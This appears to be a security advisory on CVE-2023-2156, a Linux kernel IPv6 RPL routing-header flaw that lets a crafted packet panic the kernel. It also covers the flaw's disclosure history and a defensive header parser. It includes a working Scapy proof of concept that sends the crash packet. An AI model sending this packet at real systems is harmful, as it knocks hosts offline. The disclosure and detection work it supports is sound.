Linux IPv6 “Route of Death” 0day Vulnerability in the Kernel

Details of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel have been disclosed. This vulnerability allows an attacker to crash the system by sending specially crafted IPv6 packets (packet-of-death). The issue only manifests when the RPL (Routing Protocol for Low-Power and Lossy Networks) protocol support is enabled, which is typically disabled by default in distributions and primarily used in embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of externally supplied data in the RPL protocol parsing code, which leads to a failed sanity check and a kernel panic. When the data obtained from parsing the IPv6 RPL routing header is placed into the sk_buff (socket buffer) structure, a header with the CmprI field set to 15, the Segments Left field set to 1, and CmprE set to 0 causes the 48-byte address vector to be unpacked to 528 bytes, more than the buffer space reserved for it. The skb_push function, used to place the data into the buffer, then detects that the data no longer fits and panics rather than allow a buffer overflow.

Example exploit:

    # We'll use Scapy to craft the packet
    from scapy.all import *
    import socket
    import sys

    # Use the IPv6 address of your LAN interface (passed as the first argument)
    DST_ADDR = sys.argv[1]
    SRC_ADDR = DST_ADDR

    # We use a raw socket to send the packet
    sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

    # Craft the packet
    #   Type = 3 makes this an RPL routing header
    #   Addresses contains 3 addresses, but because CmprI is 15,
    #   each octet of the first two addresses is treated as a compressed address
    #   Segleft = 1 to trigger the amplification
    #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0

    p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / \
        IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

    # Send this evil packet
    sockfd.sendto(bytes(p), (DST_ADDR, 0))
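
As an added example (not part of the original article or of the exploit above), the parser below reads the bytes of an RPL routing header the way the kernel does and computes how large the compressed address vector becomes once unpacked; it reproduces the 48 to 528 byte expansion described above and gives a defender a way to flag such headers in captured traffic. The sample header bytes are constructed from the Scapy packet's fields, and the 4x expansion threshold in is_suspicious is an assumption chosen for the example, not a kernel constant.

```python
import struct

RPL_ROUTING_TYPE = 3
IPV6_ADDR_LEN = 16

def parse_rpl_srh(hdr: bytes) -> dict:
    """Return the SRH fields and the sizes the kernel derives from them.
    Mirrors the kernel's arithmetic: the number of compressed segments n is
    (hdrlen*8 - pad - (16 - CmprE)) / (16 - CmprI), and the fully expanded
    address vector is (n + 1) * 16 bytes."""
    if len(hdr) < 8:
        raise ValueError("routing header shorter than the 8-byte fixed part")
    _nxt, hdrlen, rtype, segleft, cmpr, padbyte = struct.unpack("!6B", hdr[:6])
    if rtype != RPL_ROUTING_TYPE:
        raise ValueError(f"routing type {rtype} is not RPL (3)")
    cmpri, cmpre, pad = cmpr >> 4, cmpr & 0xF, padbyte >> 4
    addr_bytes = hdrlen * 8                      # compressed vector on the wire
    if len(hdr) < 8 + addr_bytes:
        raise ValueError("address vector truncated")
    tail = addr_bytes - pad - (IPV6_ADDR_LEN - cmpre)
    if tail < 0:
        raise ValueError("pad/CmprE larger than the address vector")
    n, rem = divmod(tail, IPV6_ADDR_LEN - cmpri)
    if rem or n + 1 > 255 or segleft > n + 1:
        raise ValueError("segment count inconsistent with header length")
    expanded = (n + 1) * IPV6_ADDR_LEN           # bytes the kernel must unpack
    return {"cmpri": cmpri, "cmpre": cmpre, "pad": pad, "segleft": segleft,
            "segments": n + 1, "compressed_bytes": addr_bytes,
            "expanded_bytes": expanded, "ratio": expanded / addr_bytes}

def is_suspicious(hdr: bytes, max_ratio: float = 4.0) -> bool:
    """Flag an SRH whose expansion ratio exceeds max_ratio (the threshold is
    an assumption chosen for this example, not a kernel constant)."""
    return parse_rpl_srh(hdr)["ratio"] > max_ratio

# Constructed sample: the fields of the Scapy packet above (hdrlen 6 = 48
# address bytes, segleft 1, CmprI 15, CmprE 0, pad 0, addresses a8::, a7::, a6::).
ADDRS = b"".join(bytes([b]) + b"\x00" * 15 for b in (0xA8, 0xA7, 0xA6))
CRAFTED_SRH = bytes([59, 6, 3, 1, 0xF0, 0, 0, 0]) + ADDRS
# Same three addresses sent uncompressed: 48 bytes stay 48 bytes.
PLAIN_SRH = bytes([59, 6, 3, 1, 0x00, 0, 0, 0]) + ADDRS

if __name__ == "__main__":
    for name, srh in (("crafted", CRAFTED_SRH), ("plain", PLAIN_SRH)):
        info = parse_rpl_srh(srh)
        print(f"{name}: {info['compressed_bytes']} -> {info['expanded_bytes']} "
              f"bytes, suspicious={is_suspicious(srh)}")
```

For the crafted header the parser reports 33 segments and a 528-byte expansion from 48 bytes on the wire, the mismatch the kernel's check trips over.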

It is noteworthy that the kernel developers were notified of the vulnerability as early as January 2022, and over the past 15 months, they attempted to address the issue three times by releasing patches in September 2022, October 2022, and April 2023. However, each time the fixes proved to be insufficient, and the vulnerability could still be exploited. Ultimately, the ZDI project, which coordinated the vulnerability remediation efforts, decided to disclose detailed information about the vulnerability without waiting for a functional fix in the kernel.

Thus, the vulnerability remains unpatched to this day. Additionally, the patch included in kernel 6.4-rc2 is ineffective. Users are advised to verify whether the RPL protocol is in use in their systems, which can be done using the command:

sysctl -a | grep -i rpl_seg_enabled
